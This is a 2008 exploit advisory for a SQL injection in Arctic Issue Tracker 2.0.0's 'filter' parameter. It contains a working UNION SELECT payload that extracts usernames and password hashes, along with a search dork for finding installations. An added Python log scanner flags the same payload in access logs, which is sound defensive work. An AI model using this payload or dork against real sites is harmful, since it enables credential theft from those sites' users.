Arctic Issue Tracker 2.0.0 - 'filter' SQL Injection (1)

EDB-ID: 6097
Author: QTRinux
Type: webapps
Platform: PHP
Published: 2008-07-17

 IloveYouTryaG
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
|     _                   __           __       __          ______     |
|   /' \            __  /'__`\        /\ \__  /'__`\       /\  ___\    |
|  /\_, \    ___   /\_\/\_\L\ \    ___\ \ ,_\/\ \/\ \  _ __\ \ \__/    |
|  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\ \___``\  |
|     \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ |
|      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\  \ \____/ |
|       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/   \/___/  |
|                  \ \____/ >> Kings of injection                      |
|                   \/___/                                             |
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
Title  ::   Remote SQL Injection
 
Author ::   QTRinux [ Qataro (at) hotmail (dot) Com ]
Application  ::  Arctic Issue Tracker v2.0.0
 
Download ::   http://www.arctictracker.com
Price    ::  $99.95 USD
Dork 1   ::  Powered by Arctic v2.0.0
 
ShoutZ   :: Allah ,InJecTor,AlQaTaRi,all InjEctOr5 TeaM ,TrYaG TeaM & Muslims Hackers
Terms of use :: This exploit is just for educational purposes, DO NOT use it for illegal acts.
--------------------------------------------[C o n t e x t]-----------------------------------------
 
Vulnerability: http:// Localhost / (Path Script) / index.php?filter= [SQL]

SQL  : -1%20union%20select%201,2,3,concat(username,0x3a,password),5%20from%20arctic_user%20where%20id=1--
 
-------------------------------------------[End of  context]----------------------------------------
thanx str0ke/*

# milw0rm.com [2008-07-17]
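
An added detection example (not part of the original advisory or of Arctic Issue Tracker): it scans web-server access log lines for `index.php` requests whose decoded `filter` value is not a plain integer, which is how the payload above appears in logs. It assumes combined-format logs and that legitimate `filter` values are numeric ids; the `/arctic/` path, IP addresses and log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: a legitimate `filter` value is a plain non-negative integer id.
VALID_FILTER = re.compile(r"\d+")
# Secondary hints used only to grade severity; the integer check is the real test.
SQL_HINTS = re.compile(r"\b(union|select|concat|arctic_user)\b", re.IGNORECASE)
# Request part of a combined-format access log line: "METHOD target HTTP/x.y"
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def classify_filter(value):
    """Return 'ok', 'suspicious' (not an integer) or 'sqli' (SQL keywords present)."""
    if VALID_FILTER.fullmatch(value):
        return "ok"
    return "sqli" if SQL_HINTS.search(value) else "suspicious"


def scan_access_log(lines):
    """Yield (client_ip, verdict, decoded_filter) for non-benign index.php requests."""
    for line in lines:
        m = REQUEST.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        if not url.path.endswith("/index.php"):
            continue
        # parse_qs percent-decodes values, so %20union%20select is seen in clear.
        for value in parse_qs(url.query, keep_blank_values=True).get("filter", []):
            verdict = classify_filter(value)
            if verdict != "ok":
                yield line.split(" ", 1)[0], verdict, value


# Constructed sample log lines (documentation IPs, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [17/Jul/2008:10:00:01 +0000] "GET /arctic/index.php?filter=3 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [17/Jul/2008:10:02:44 +0000] "GET /arctic/index.php?filter=-1%20union%20select%201,2,3,concat(username,0x3a,password),5%20from%20arctic_user%20where%20id=1-- HTTP/1.1" 200 4890',
    '203.0.113.5 - - [17/Jul/2008:10:05:12 +0000] "GET /arctic/index.php?filter=3%27 HTTP/1.1" 500 312',
    '192.0.2.10 - - [17/Jul/2008:10:06:30 +0000] "GET /arctic/style.css HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for ip, verdict, value in scan_access_log(SAMPLE_LOG):
        print(f"{ip}\t{verdict}\t{value}")
```

The integer check is what decides a hit; the keyword match only raises the verdict from `suspicious` to `sqli`, so an encoded or obfuscated variant that avoids those keywords is still reported.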